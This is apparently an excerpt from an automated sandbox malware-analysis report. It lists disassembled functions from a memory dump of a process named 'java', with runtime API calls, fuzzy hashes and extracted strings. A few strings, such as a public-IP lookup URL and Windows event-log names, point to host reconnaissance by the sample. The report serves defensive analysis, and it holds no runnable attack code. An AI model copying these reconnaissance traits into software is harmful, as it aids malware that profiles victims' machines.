                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1FB53E
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1FB58D
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1FB5CC
                                        • __std_exception_copy.VCRUNTIME140 ref: 00007FF65E1FB618
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1FB665
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$memmove$__std_exception_copy
                                        • String ID: type_error
                                        • API String ID: 450636425-1406221190
                                        • Opcode ID: 105f28b83217c533a0621a35a7ac762c2119fe9a0180d406f36b6523ef19bbb5
                                        • Instruction ID: 37910a63bdbe4dadaeb72cbd7d512faff53cad1fc5281f9e88c9dee1cfb39a31
                                        • Opcode Fuzzy Hash: 105f28b83217c533a0621a35a7ac762c2119fe9a0180d406f36b6523ef19bbb5
                                        • Instruction Fuzzy Hash: DA51C4A2F18B4295FF10CB75D6507BC2321EB657A4F045332FA6DA2AD9EE2CD585C340
                                        APIs
                                          • Part of subcall function 00007FF65E1F34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF65E1F14B3), ref: 00007FF65E1F34D8
                                          • Part of subcall function 00007FF65E1F34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF65E1F14B3), ref: 00007FF65E1F3579
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1FC0C2
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1FC111
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1FC150
                                        • __std_exception_copy.VCRUNTIME140 ref: 00007FF65E1FC1A0
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1FC1ED
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$memmove$__std_exception_copy
                                        • String ID: type_error
                                        • API String ID: 450636425-1406221190
                                        • Opcode ID: 294e30e33237f614d553a8616d03b456f925f8fa26abcf6bbcb68f5e37fb1cb1
                                        • Instruction ID: 37c37e330ca2b3612c2d577a6fb25ae4fc4d9da7d5dda5ee772c263ce7c59a77
                                        • Opcode Fuzzy Hash: 294e30e33237f614d553a8616d03b456f925f8fa26abcf6bbcb68f5e37fb1cb1
                                        • Instruction Fuzzy Hash: 1751B562E18B8294EF10CF75D6903BC2321EB647A4F445732FA6CA2AD9EF6CD194D344
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: memmove$?uncaught_exceptions@std@@Concurrency::cancel_current_taskD@std@@@std@@Osfx@?$basic_ostream@U?$char_traits@_invalid_parameter_noinfo_noreturn
                                        • String ID:
                                        • API String ID: 3994297871-0
                                        • Opcode ID: 5efb458ff86e86285e27d9c52f97ec16f8b9645881acf75e5b2c9e820c793c3f
                                        • Instruction ID: 30e01af48731139e14168217f432e1d0b6246ffd6905d08a540ff8771f814ffb
                                        • Opcode Fuzzy Hash: 5efb458ff86e86285e27d9c52f97ec16f8b9645881acf75e5b2c9e820c793c3f
                                        • Instruction Fuzzy Hash: EF41D262B09B4281EE209B26E6043B96351BF64FD0F084231EE7EAB796DF3CD4818354
                                        APIs
                                          • Part of subcall function 00007FF65E1F34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF65E1F14B3), ref: 00007FF65E1F34D8
                                          • Part of subcall function 00007FF65E1F34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF65E1F14B3), ref: 00007FF65E1F3579
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1FBDD2
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1FBE21
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1FBE60
                                        • __std_exception_copy.VCRUNTIME140 ref: 00007FF65E1FBEB0
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1FBEFD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$memmove$__std_exception_copy
                                        • String ID: other_error
                                        • API String ID: 450636425-896093151
                                        • Opcode ID: 31ea6dbdf5b28761d069e831836c2231da87d872b6197d28bd07c80b67e1e4fa
                                        • Instruction ID: cc1676501ab72c0b77aac99d8dc68bed154a729f35fb808e03dca5425a34d312
                                        • Opcode Fuzzy Hash: 31ea6dbdf5b28761d069e831836c2231da87d872b6197d28bd07c80b67e1e4fa
                                        • Instruction Fuzzy Hash: CD51C662E15B4195EF10CF75D6907BC2321EB647A8F445732FA6CA2AD9EF6CD180C340
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmemset
                                        • String ID: https://api.ipify.org
                                        • API String ID: 1489393663-2202801394
                                        • Opcode ID: c8c14aa842574fd009ddf9e4f8489f603fb97367f0db299a64f8336e29875efc
                                        • Instruction ID: b6dcebe1dc1c8166b37f9b661a704924f19fd0cfa757202a79ff0489c2a062ef
                                        • Opcode Fuzzy Hash: c8c14aa842574fd009ddf9e4f8489f603fb97367f0db299a64f8336e29875efc
                                        • Instruction Fuzzy Hash: D941B362B09B4181EE209B12A6043AD6361BB58BD4F580335EF7D5B785DF3DE48183A4
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                        • String ID: Application$Security
                                        • API String ID: 2075926362-3957089671
                                        • Opcode ID: 91129967e5f474a8559f9e92a49f95da33b47701dd3b920b909fce4831cfa8d4
                                        • Instruction ID: 1edd787d3d4ff33dd315a50d51db6fe69637f69873cb5a9447730ed48b6c08bb
                                        • Opcode Fuzzy Hash: 91129967e5f474a8559f9e92a49f95da33b47701dd3b920b909fce4831cfa8d4
                                        • Instruction Fuzzy Hash: 4E31EB62B0974185EE249B5596402B92294EF24BF4F6C0730FE7D977D1DF7CE8918390
                                        APIs
                                        • ?_Init@locale@std@@CAPEAV_Locimp@12@_N@Z.MSVCP140 ref: 00007FF65E1F21C0
                                          • Part of subcall function 00007FF65E1FD9F0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF65E1F3975), ref: 00007FF65E1FDA0A
                                        • ??0?$codecvt@_WDU_Mbstatet@@@std@@QEAA@_K@Z.MSVCP140 ref: 00007FF65E1F2216
                                        • ?_New_Locimp@_Locimp@locale@std@@CAPEAV123@AEBV123@@Z.MSVCP140 ref: 00007FF65E1F2232
                                        • ??Bid@locale@std@@QEAA_KXZ.MSVCP140 ref: 00007FF65E1F2242
                                        • ?_Addfac@_Locimp@locale@std@@AEAAXPEAVfacet@23@_K@Z.MSVCP140 ref: 00007FF65E1F2251
                                        • ??4?$_Yarn@D@std@@QEAAAEAV01@PEBD@Z.MSVCP140 ref: 00007FF65E1F2265
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: Locimp@locale@std@@$??0?$codecvt@_??4?$_Addfac@_Bid@locale@std@@D@std@@Init@locale@std@@Locimp@12@_Locimp@_Mbstatet@@@std@@New_V01@V123@V123@@Vfacet@23@_Yarn@malloc
                                        • String ID:
                                        • API String ID: 3292048638-0
                                        • Opcode ID: b916503ec65f24a8914a35f5d9ad6752db60bb27910833d0bf65805ffbe94532
                                        • Instruction ID: 77efe4691f9a846ddacc561a917fe9af559bcbc66ba0baca4d95a9bec9e0bae7
                                        • Opcode Fuzzy Hash: b916503ec65f24a8914a35f5d9ad6752db60bb27910833d0bf65805ffbe94532
                                        • Instruction Fuzzy Hash: DF313E32A05B4586EF20DF66F65426AB3A0FB98B80F184135DB8E53B65EF3CE094C341
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: ExceptionThrow
                                        • String ID: Security$System
                                        • API String ID: 432778473-2661570791
                                        • Opcode ID: 34f75a92fe2883e6bef5124e5d73f19cf48c367034ce9e8187bb623e8f67000d
                                        • Instruction ID: 01578b8c4caad32f295d70011f96f48fe8b7f52b2ef0aa0546d5fc38b007cc0f
                                        • Opcode Fuzzy Hash: 34f75a92fe2883e6bef5124e5d73f19cf48c367034ce9e8187bb623e8f67000d
                                        • Instruction Fuzzy Hash: 5BC1F072A09B8186EF219F65E6403AC33A1EB64B84F088135EB9D67746EF3CD191C390
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: ExceptionThrow$_invalid_parameter_noinfo_noreturn
                                        • String ID: System
                                        • API String ID: 2822070131-3470857405
                                        • Opcode ID: 6e6eb4d2878bb9674ee793371b75d8ffaf70bd0a5a0b79eac3d4ef2fec82ea3c
                                        • Instruction ID: 533044e66634ecfe9612fc8cf0cfaff9f5a32889ed1faf0901f35635cd81eec1
                                        • Opcode Fuzzy Hash: 6e6eb4d2878bb9674ee793371b75d8ffaf70bd0a5a0b79eac3d4ef2fec82ea3c
                                        • Instruction Fuzzy Hash: ACB1D662A08B8681EF218F24D6402BD6760FBA5794F189131EBAD63696DF3CE5C1C390
                                        APIs
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1F2B12
                                          • Part of subcall function 00007FF65E1FD9F0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF65E1F3975), ref: 00007FF65E1FDA0A
                                          • Part of subcall function 00007FF65E1F11C0: ?_Xlength_error@std@@YAXPEBD@Z.MSVCP140 ref: 00007FF65E1F11CB
                                        • memmove.VCRUNTIME140 ref: 00007FF65E1F2B33
                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF65E1F2B4F
                                          • Part of subcall function 00007FF65E1F1120: __std_exception_copy.VCRUNTIME140 ref: 00007FF65E1F1164
                                        • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF65E1F2BB5
                                        • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF65E1F2BBE
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: D@std@@@std@@U?$char_traits@$??1?$basic_ios@??1?$basic_iostream@Concurrency::cancel_current_taskXlength_error@std@@__std_exception_copy_invalid_parameter_noinfo_noreturnmallocmemmove
                                        • String ID:
                                        • API String ID: 144170543-0
                                        • Opcode ID: e7cfce1c0d0b2e6765443c67114fc8dbc29c1e00c1e070038aa946d8ba5488e3
                                        • Instruction ID: 9a556e68644941085716d6a5fb785260219a8cacbe6f26de6ef2d43383899b9c
                                        • Opcode Fuzzy Hash: e7cfce1c0d0b2e6765443c67114fc8dbc29c1e00c1e070038aa946d8ba5488e3
                                        • Instruction Fuzzy Hash: 9D41A332B09B4281EE649F25E6403B82364FB54BA4F189631EA3D57BD6DE3CD4D6C350
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: Concurrency::cancel_current_task
                                        • String ID:
                                        • API String ID: 118556049-3916222277
                                        • Opcode ID: ef240bb9e472c72bf3f8a87a7252f93db726828450f28ef30e14e3b6c24eb53b
                                        • Instruction ID: 468a0e8263e0c9f5e97e3019848fed4d1ce737492ce82509bcfa4aac2d485fb2
                                        • Opcode Fuzzy Hash: ef240bb9e472c72bf3f8a87a7252f93db726828450f28ef30e14e3b6c24eb53b
                                        • Instruction Fuzzy Hash: 31517F72A08B4596EF258F2AD65026C37A0FB58B90F584635EF6D977A0CF3CE4A1C350
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: __current_exception__current_exception_contextterminate
                                        • String ID: csm
                                        • API String ID: 2542180945-1018135373
                                        • Opcode ID: 9a71d54b323909634587fecb3b0b832e45101661dec1fdc02d4fe101acb10c47
                                        • Instruction ID: 3b460932bd00ecef3e657bf424209f0d1b86f8b532ebecccccf65cc2ae798f6e
                                        • Opcode Fuzzy Hash: 9a71d54b323909634587fecb3b0b832e45101661dec1fdc02d4fe101acb10c47
                                        • Instruction Fuzzy Hash: EAF0F937605B95CACF649F21E8811AC3364FB5CB98B4D6131FA4D97755CF38D8908360
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: memmovememset
                                        • String ID:
                                        • API String ID: 1288253900-0
                                        • Opcode ID: a361461ebd74b817559f1ba7322bb17d22a5080eb4e1f2fdce319b824f189eee
                                        • Instruction ID: bfb6f637c7103da62fee516de014c3be35d38454e937edc248685e5a3c59dac6
                                        • Opcode Fuzzy Hash: a361461ebd74b817559f1ba7322bb17d22a5080eb4e1f2fdce319b824f189eee
                                        • Instruction Fuzzy Hash: A2412C26B297D193DF24CB28C2812AD6755FB51780F488031E7ADA7B86DF3DD915C350
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                        • String ID:
                                        • API String ID: 2075926362-0
                                        • Opcode ID: e2144259be0b6505c386b59d3feed13163a1020fd9c41315a436067efdf29a82
                                        • Instruction ID: 20cd12461cda21a70acf50038538f3822729333daeee687ee2dcd66fd8fc8e5d
                                        • Opcode Fuzzy Hash: e2144259be0b6505c386b59d3feed13163a1020fd9c41315a436067efdf29a82
                                        • Instruction Fuzzy Hash: 6C31E562B09B8284FE259B55A7003B92255AB14FE4F5C0631EE3DA77C6DE7DE4C1C3A0
                                        APIs
                                        • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,00007FF65E1F14B3), ref: 00007FF65E1F3682
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00007FF65E1F14B3), ref: 00007FF65E1F36C0
                                        • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,00007FF65E1F14B3), ref: 00007FF65E1F36CA
                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF65E1F36FF
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                        • String ID:
                                        • API String ID: 2016347663-0
                                        • Opcode ID: 17b1863025fad19d1496731260b1b962d051594f66a05eb6238705a58c684df4
                                        • Instruction ID: a92f4805ff7feb2fb862dc14b5f85bb6f452efe33e083d109f02bf3adf7f1832
                                        • Opcode Fuzzy Hash: 17b1863025fad19d1496731260b1b962d051594f66a05eb6238705a58c684df4
                                        • Instruction Fuzzy Hash: 69310671B0978185EE209F25A60436C6355AB24BE4F5C0631EE7D9BBD6DE7CE1418360
                                        APIs
                                        • memmove.VCRUNTIME140(00000131,00000000,?,00007FF65E1F577C,?,?,?,?,?,?,?,?,?,?,?,00000131), ref: 00007FF65E1FC9FD
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: memmove
                                        • String ID:
                                        • API String ID: 2162964266-0
                                        • Opcode ID: 22c5a87cf1eb821d3e1b326642f832fd49eba514ca20bfb2045cdbb9c517b22d
                                        • Instruction ID: 1449a37bb1bc89205afdf56820e8d9b8fd8dc1f180a7b12c2114bc74c14521a7
                                        • Opcode Fuzzy Hash: 22c5a87cf1eb821d3e1b326642f832fd49eba514ca20bfb2045cdbb9c517b22d
                                        • Instruction Fuzzy Hash: 7F31E723B1578185FE259B65A6403B82144AF24BF4F2C0231EE7C677D2EE3CA4D393A4
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                        • String ID:
                                        • API String ID: 2016347663-0
                                        • Opcode ID: 423f6011978099a5633de49def7021714698bb932306e6b32f0bcf118006fb64
                                        • Instruction ID: 454770889572c1490df72c5585830030f1c8efdad07787d300588f742282bf8d
                                        • Opcode Fuzzy Hash: 423f6011978099a5633de49def7021714698bb932306e6b32f0bcf118006fb64
                                        • Instruction Fuzzy Hash: 3531D461F0974185EE309B1197043B96356EB14BE0F5C4731EA7D9BBD9DE3CE04183A0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: memmove$Concurrency::cancel_current_task
                                        • String ID:
                                        • API String ID: 1247048853-0
                                        • Opcode ID: 0856d8ef28bf0b974e58a5cbe811db801bf981de1f50d7aebe3243824524e5ab
                                        • Instruction ID: f5f07a54cccd2d5b4b7c22e242f21bbf73bae2db839e62a737f04b2249b8ddb9
                                        • Opcode Fuzzy Hash: 0856d8ef28bf0b974e58a5cbe811db801bf981de1f50d7aebe3243824524e5ab
                                        • Instruction Fuzzy Hash: BB21F9A2B0975645FE359B51A6003782244AF64BF5F1C0B30EE7DA77D2DF3CA4828360
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
